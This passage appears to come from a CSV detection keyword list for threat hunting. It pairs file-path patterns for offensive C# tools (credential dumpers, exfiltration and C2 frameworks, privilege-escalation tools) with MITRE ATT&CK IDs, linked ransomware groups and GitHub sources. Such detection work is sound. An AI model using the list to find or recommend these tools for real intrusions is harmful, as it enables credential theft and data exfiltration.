"*/SharpDPAPI.exe*",".{0,1000}\/SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","SharpDPAPI","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - 
TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10941" "*/SharpDPAPI.git*",".{0,1000}\/SharpDPAPI\.git.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","10942" "*/SharpDump*",".{0,1000}\/SharpDump.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","10943" "*/SharpDump.exe*",".{0,1000}\/SharpDump\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10944" "*/SharpDump.exe*",".{0,1000}\/SharpDump\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp 
Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10945" "*/SharpDump.exe*",".{0,1000}\/SharpDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10946" "*/SharpDump.exe*",".{0,1000}\/SharpDump\.exe.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","1","N/A","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","10947" "*/SharpDump.git*",".{0,1000}\/SharpDump\.git.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","1","N/A","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","10948" "*/SharpEdge.exe*",".{0,1000}\/SharpEdge\.exe.{0,1000}","offensive_tool_keyword","SharpEdge","C# 
Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","1","N/A","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","10949" "*/SharpEdge.git*",".{0,1000}\/SharpEdge\.git.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","1","N/A","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","10950" "*/SharpEDRChecker-*.zip*",".{0,1000}\/SharpEDRChecker\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","10951" "*/SharpEDRChecker.exe*",".{0,1000}\/SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10952" "*/SharpEDRChecker.exe*",".{0,1000}\/SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10953" "*/SharpEDRChecker.exe*",".{0,1000}\/SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10954" "*/SharpEDRChecker.git*",".{0,1000}\/SharpEDRChecker\.git.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","10955" "*/SharpEDRChecker/*",".{0,1000}\/SharpEDRChecker\/.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks 
for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","10956" "*/SharpEfsPotato*",".{0,1000}\/SharpEfsPotato.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","10957" "*/SharpElevator.exe*",".{0,1000}\/SharpElevator\.exe.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","1","N/A","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","10958" "*/SharpElevator.git*",".{0,1000}\/SharpElevator\.git.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","1","N/A","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","10959" "*/SharPersist.exe*",".{0,1000}\/SharPersist\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10960" "*/SharPersist.exe*",".{0,1000}\/SharPersist\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10961" "*/SharPersist.exe*",".{0,1000}\/SharPersist\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10962" "*/SharPersist.git*",".{0,1000}\/SharPersist\.git.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","10963" "*/SharpEventLog.exe*",".{0,1000}\/SharpEventLog\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 
- T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10964" "*/SharpEventLog.exe*",".{0,1000}\/SharpEventLog\.exe.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","1","N/A","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","10965" "*/SharpEventLog.git*",".{0,1000}\/SharpEventLog\.git.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","1","N/A","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","10966" "*/SharpEventPersist.git*",".{0,1000}\/SharpEventPersist\.git.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","10967" 
"*/SharpExcelDCom.exe*",".{0,1000}\/SharpExcelDCom\.exe.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","1","N/A","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","10968" "*/SharpExcelibur.exe*",".{0,1000}\/SharpExcelibur\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10969" "*/SharpExec.exe*",".{0,1000}\/SharpExec\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10970" 
"*/SharpExec.exe*",".{0,1000}\/SharpExec\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10971" "*/SharpExec.exe*",".{0,1000}\/SharpExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10972" "*/SharpExfil.git*",".{0,1000}\/SharpExfil\.git.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","1","N/A","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","10973" "*/SharpExfiltrate.git*",".{0,1000}\/SharpExfiltrate\.git.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data 
Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","10974" "*/SharpExfiltrate/*",".{0,1000}\/SharpExfiltrate\/.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","10975" "*/SharpExShell.exe*",".{0,1000}\/SharpExShell\.exe.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","1","N/A","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","10976" "*/SharpExShell.git*",".{0,1000}\/SharpExShell\.git.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","1","N/A","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","10977" "*/SharpFinder.exe*",".{0,1000}\/SharpFinder\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10978" "*/SharpFtpC2.git*",".{0,1000}\/SharpFtpC2\.git.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","1","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","10979" "*/SharpFtpC2/tarball/*",".{0,1000}\/SharpFtpC2\/tarball\/.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","1","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","10980" "*/SharpFtpC2/zipball/*",".{0,1000}\/SharpFtpC2\/zipball\/.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","1","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","10981" "*/SharpGetTitle.exe*",".{0,1000}\/SharpGetTitle\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 
- T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10982" "*/SharpGhostTask*",".{0,1000}\/SharpGhostTask.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","1","N/A","N/A","10","2","114","12","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z","10983" "*/SharpGmailC2.git*",".{0,1000}\/SharpGmailC2\.git.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","10984" "*/SharpGpo.exe*",".{0,1000}\/SharpGpo\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10985" "*/SharpGpo.exe*",".{0,1000}\/SharpGpo\.exe.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10986" "*/SharpGPOAbuse.exe*",".{0,1000}\/SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10987" "*/SharpGPOAbuse.exe*",".{0,1000}\/SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10988" 
"*/SharpGPOAbuse.exe*",".{0,1000}\/SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10989" "*/SharpGraphView.git*",".{0,1000}\/SharpGraphView\.git.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","1","N/A","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","10990" "*/SharpHandler.exe*",".{0,1000}\/SharpHandler\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10991" "*/SharpHandler.exe*",".{0,1000}\/SharpHandler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
